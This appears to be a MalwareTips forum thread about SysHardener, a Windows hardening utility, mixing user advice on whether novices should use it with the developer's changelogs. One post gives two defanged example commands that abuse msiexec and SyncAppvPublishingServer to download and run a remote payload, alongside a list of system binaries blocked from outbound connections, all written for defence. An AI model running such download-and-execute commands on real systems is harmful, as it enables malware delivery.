NVT SysHardener: Harden Windows Settings

Azure

Level 28
Verified
Top Poster
Content Creator
Oct 23, 2014
1,712
If you view yourself as a very novice user, then it might be for the best to wait until this software implements a backup of your current settings. That way you should be able to fix any issue relatively quickly.

Some users have complained that certain things don't work right for them, after applying the recommended settings. So it's hard to say.
I kinda view this software as beta. So, I can see some people having issues with it.
 
P

plat1098

Thread author
Would SysHardener be OK for the "novice" user or best left to those who are more familiar with it?

I'm a novice user of this software--what is pretty necessary is an image or restore point in case something goes "awry." Or wait for a more finished, refined version. :)
 

AMD1

Level 5
Verified
Aug 21, 2012
208
Some users have complained that certain things don't work right for them, after applying the recommended settings. So it's hard to say.

Well I know it's a Beta version so it's likely there will be things needing a fix but coupled with a novice user I think I might wait until it becomes a stable release and then may give it a go.
 
  • Like
Reactions: shmu26

AMD1

Level 5
Verified
Aug 21, 2012
208
I'm a novice user of this software--what is pretty necessary is an image or restore point in case something goes "awry." Or wait for a more finished, refined version. :)

Yes, I think I will wait until there is a rollback feature or something.

Having said that, I do have EXE Radar Pro v4 Beta on the go and getting the hang of that but I suppose you can simply delete any process rule and it has no adverse affect.
 
  • Like
Reactions: shmu26 and plat1098

shmu26

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,150
In my opinion, OSArmor gives you more protection and less anguish. Because with OSArmor, if something gets blocked, it is usually very easy to unblock it. And at the very worst, you just uninstall it, and wave goodbye, and it's gone. It doesn't make any changes to system settings.

SysHardener is unnecessary if you use OSA.
 

AMD1

Level 5
Verified
Aug 21, 2012
208
In my opinion, OSArmor gives you more protection and less anguish. Because with OSArmor, if something gets blocked, it is usually very easy to unblock it. And at the very worst, you just uninstall it, and wave goodbye, and it's gone. It doesn't make any changes to system settings.

SysHardener is unnecessary if you use OSA.

OSArmor instead of EXE Radar Pro V4 ?
 

shmu26

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,150
Level 3 - who gave me that. I think I should be relegated to level 1 !
The "levels" are all about how many posts you make. There could be quiet geniuses who have a low level, and big-mouthed dummies who have a high level.
 
  • Like
Reactions: oldschool and Azure

shmu26

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,150
OSArmor instead of EXE Radar Pro V4 ?
Yes!
ERP 4 is not ready yet, and even when it is, the target audience is advanced users.
OSA is already working very well, and is appropriate for all members of this forum.
 
  • Like
Reactions: neon and oldschool

AMD1

Level 5
Verified
Aug 21, 2012
208
Yes!
ERP 4 is not ready yet, and even when it is, the target audience is advanced users.
OSA is already working very well, and is appropriate for all members of this forum.

I will export my rules on ERP 4 and have a go with OSArmor. The reason I went for ERP 4 was because I have a paid license for V3
 
D

Deleted member 178

Thread author
Hi,Would SysHardener be OK for the "novice" user or best left to those who are more familiar with it?
If you are able to relate an issue to SH then yes you can use it, if not don't even try because there is no alerts, no popups, so you won't know what is causing what on your system.
At its current state, SH is mostly for advanced users who knows what the options do.
 

shmu26

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,150
I will export my rules on ERP 4 and have a go with OSArmor. The reason I went for ERP 4 was because I have a paid license for V3
1 If you can handle ERP, you should not call yourself a novice!
2 Some users say that ERP 4 is not protecting properly yet, and others say that it is not making rules properly yet.
3 At this point, if you are inclined towards ERP, the best protection is OSA + ERP 3 beta.
You could use ERP 3 stable, but then you need to build your own vulnerable processes list. If you are using OSA at max settings, you don't need to add very much. The most important process missing from OSA is rundll32 (system32 and syswow64).
 
  • Like
Reactions: oldschool

NoVirusThanks

From NoVirusThanks
Verified
Developer
Well-known
Aug 23, 2012
292
Released SysHardener v1.3:
Harden Windows Settings with SysHardener | NoVirusThanks

Changelog:

+ New option "Disable Loading of DLLs via AppInit_DLLs"
+ New option "Load Only Digitally Signed DLLs via AppInit_DLLs"
+ New option "Disable Windows Subsystem for Linux"
+ Improved "Disable PowerShell v2.0 Engine"
+ Added more "blue" icons that can be clicked to get more info
+ Some "orange" icons can be clicked to get more info
+ Reduced height of the main application window
+ Main application window is sizeable and can be maximized
+ Added "Tweaks" option on top main menu to "select all\suggested tweaks\unselect all" tweaks
+ Minor fixes and optimizations
+ Updated help file

Here is a screenshot:

syshardener.png


New text on the help (faqs) file:

Q - When I uninstall SysHardener, are all applied tweaks restored to their defaults?

A - No, when you uninstall SysHardener it doesn't apply or restore any tweak. It just removes SysHardener's installation files from your system.

Q - When I check "Disable Loading of DLLs via AppInit_DLLs" tweak and then I click "Restore Defaults", LoadAppInit_DLLs is still disabled?

A - Yes, if you have Secure Boot enabled, by default the OS disables LoadAppInit_DLLs, read more here:

The AppInit_DLLs mechanism is disabled by default when secure boot is enabled
AppInit DLLs and Secure Boot (Windows)

So SysHardener will keep LoadAppInit_DLLs disabled (factory-setting value) when you click "Restore Selected" button.

If you really need to enable LoadAppInit_DLLs browse with Regedit to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Then set the value of LoadAppInit_DLLs to 1 (DWORD)

Reboot the PC.

Q - When I check "Disable Windows Subsystem for Linux" tweak and then I click "Restore Defaults", "Windows Subsystem for Linux" is still disabled?

A - Yes, even if you click "Restore Defaults" with "Disable Windows Subsystem for Linux" checked, SysHardener will keep it disabled.

To install it just follow these instructions:

How to Install and Use the Linux Bash Shell on Windows 10

However, keep in mind it can be dangerous to have it enabled:

Bashware: Malware Can Abuse Windows 10's Linux Shell to Bypass Security Software

Here is what is on the todo list:

- Create a backup of the user current "setup" before it applies the changes.
- Check for updates option from within the software

Some FAQs:

I see there is a confusion about how to restore settings, I'll try to reply to a few questions:

Q - How to restore settings?

A - Select only the tweaks you want to reset\restore to their defaults and then click "Restore Selected"

Q - When I uninstall SysHardener, are all twekas restored to their defaults?

A - No, SysHardener just removes its files from your system once it is uninstalled.

Q - If I want to restore all pre-selected (suggested) tweaks to their defaults, what can I do?

A - On the top main menu "Tweaks" select "Suggested Tweaks" to select\check all suggested (pre-selected) tweaks. Then click the button "Restore Selected" to restore the selected tweaks to their factory-settings values.

Basically, the button "Restore Selected" allows you to only reset\restore the selected (checked) tweaks, not all of them.
 

NoVirusThanks

From NoVirusThanks
Verified
Developer
Well-known
Aug 23, 2012
292
Released SysHardener v1.4:
Harden Windows Settings with SysHardener | NoVirusThanks

Here is the changelog:

+ New option "Block Oubound Connections for SyncAppvPublishing.exe" (checked)
+ New option "Block Oubound Connections for Certutil.exe" (checked)
+ New option "Block Oubound Connections for Msiexec.exe" (unchecked)
+ New option "Block Oubound Connections for Odbcconf.exe" (checked)
+ New option "Block Oubound Connections for AtBroker.exe" (checked)
+ "Block Outbound Connections for Csrss.exe" is checked
+ Added button "Windows Updates" on "System Tools" tab
+ Move progress bar after asking-for\creating restore point
+ Updated help file

Just a quick update to mitigate:

CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV
* Tweak: "Block Oubound Connections for Certutil.exe"

Msiexec.exe could allow attackers to download and execute a remote payload
Example: cmd.exe /c msiexec /q /I "hxxp://127.0.0.1/payload.msi"
* Tweak: "Block Oubound Connections for Msiexec.exe"

SyncAppvPublishing.exe could allow attackers to download and execute a remote payload
Example: SyncAppvPublishingServer.exe ".; *DownloadFile() or DownloadString() or Start-Process mshta.exe hxxp://127.0.0.1/payload.hta"
* Tweak: "Block Oubound Connections for SyncAppvPublishingServer.exe"
 

NoVirusThanks

From NoVirusThanks
Verified
Developer
Well-known
Aug 23, 2012
292
Released SysHardener v1.5:
Harden Windows Settings with SysHardener | NoVirusThanks

Here is the changelog:

+ Updated Help\FAQs file
+ Added new command-line parameter: /customsettings "C:\Path\To\Settings.ini"
+ Removed button "Un\Select All" -> Use the "Tweaks" menu in the top main menu
+ Added option "Save to .INI file" on "Tweaks" main menu
+ Added option "Load from .INI file" on "Tweaks" main menu
+ New option Block Outbound Connections for Cmstp.exe (checked)
+ New option Block Outbound Connections for Esentutl.exe (checked)
+ New option Block Outbound Connections for Extrac32.exe (checked)
+ New option Block Outbound Connections for Expand.exe (unchecked)
+ New option Block Outbound Connections for Makecab.exe (checked)
+ New option Block Outbound Connections for Pcalua.exe (checked)
+ New option Block Outbound Connections for Print.exe (unchecked)
+ New option Block Outbound Connections for Replace.exe (unchecked)
+ New option Block Outbound Connections for ScriptRunner.exe (checked)
+ New option Block Outbound Connections for Scrcons.exe (checked)
+ New option Block Outbound Connections for Ftp.exe (unchecked)
+ New option Block Outbound Connections for Tftp.exe (unchecked)
+ New option Block Outbound Connections for Telnet.exe (unchecked)
+ Improved detection of Acrobat Reader 11.0

Screenshot fo the "Save to .INI file" and "Load from .INI file" options:

syshardener15.png
 

shmu26

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,150
Released SysHardener v1.5:
Harden Windows Settings with SysHardener | NoVirusThanks

Here is the changelog:

+ Updated Help\FAQs file
+ Added new command-line parameter: /customsettings "C:\Path\To\Settings.ini"
+ Removed button "Un\Select All" -> Use the "Tweaks" menu in the top main menu
+ Added option "Save to .INI file" on "Tweaks" main menu
+ Added option "Load from .INI file" on "Tweaks" main menu
+ New option Block Outbound Connections for Cmstp.exe (checked)
+ New option Block Outbound Connections for Esentutl.exe (checked)
+ New option Block Outbound Connections for Extrac32.exe (checked)
+ New option Block Outbound Connections for Expand.exe (unchecked)
+ New option Block Outbound Connections for Makecab.exe (checked)
+ New option Block Outbound Connections for Pcalua.exe (checked)
+ New option Block Outbound Connections for Print.exe (unchecked)
+ New option Block Outbound Connections for Replace.exe (unchecked)
+ New option Block Outbound Connections for ScriptRunner.exe (checked)
+ New option Block Outbound Connections for Scrcons.exe (checked)
+ New option Block Outbound Connections for Ftp.exe (unchecked)
+ New option Block Outbound Connections for Tftp.exe (unchecked)
+ New option Block Outbound Connections for Telnet.exe (unchecked)
+ Improved detection of Acrobat Reader 11.0

Screenshot fo the "Save to .INI file" and "Load from .INI file" options:

View attachment 188500
Thanks, Andreas!
 

oldschool

Level 81
Verified
Top Poster
Well-known
Mar 29, 2018
7,044
Released SysHardener v1.3:
Harden Windows Settings with SysHardener | NoVirusThanks

Changelog:

+ New option "Disable Loading of DLLs via AppInit_DLLs"
+ New option "Load Only Digitally Signed DLLs via AppInit_DLLs"
+ New option "Disable Windows Subsystem for Linux"
+ Improved "Disable PowerShell v2.0 Engine"
+ Added more "blue" icons that can be clicked to get more info
+ Some "orange" icons can be clicked to get more info
+ Reduced height of the main application window
+ Main application window is sizeable and can be maximized
+ Added "Tweaks" option on top main menu to "select all\suggested tweaks\unselect all" tweaks
+ Minor fixes and optimizations
+ Updated help file

Here is a screenshot:

View attachment 184424

New text on the help (faqs) file:



Here is what is on the todo list:

- Create a backup of the user current "setup" before it applies the changes.
- Check for updates option from within the software

Some FAQs:

I see there is a confusion about how to restore settings, I'll try to reply to a few questions:

Q - How to restore settings?

A - Select only the tweaks you want to reset\restore to their defaults and then click "Restore Selected"

Q - When I uninstall SysHardener, are all twekas restored to their defaults?

A - No, SysHardener just removes its files from your system once it is uninstalled.

Q - If I want to restore all pre-selected (suggested) tweaks to their defaults, what can I do?

A - On the top main menu "Tweaks" select "Suggested Tweaks" to select\check all suggested (pre-selected) tweaks. Then click the button "Restore Selected" to restore the selected tweaks to their factory-settings values.

Basically, the button "Restore Selected" allows you to only reset\restore the selected (checked) tweaks, not all of them.


I appreciate this post but it is still a bit confusing, or I am misunderstanding it. I am not having any issues using the app with "Suggested Tweaks" applied but, IF I wanted to uninstall the app the instructions are not clear. As a feature update, could you please make in settings a "Restore MS Defaults" option? Also, if you are saying here that complete uninstallation is impossible it would be nice to alert users to this and users could decide beforehand IF they want to install this very nice app in the first place. I think this would clarify things for all users, esp. less advanced users.
 
Last edited:

CyberTech

Level 44
Verified
Top Poster
Well-known
Nov 10, 2017
3,247
UpFQIit.jpg

This is ShareX like screenshot program ok well it was working fine 2 days ago or so yesterday i clicked some checkbox list i dont remember which one im sure its syshardener because i did wrong :/ . i dont want restore selected but i really need to know which one is that? you guys know this?
 
  • Like
Reactions: vtqhtr413

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top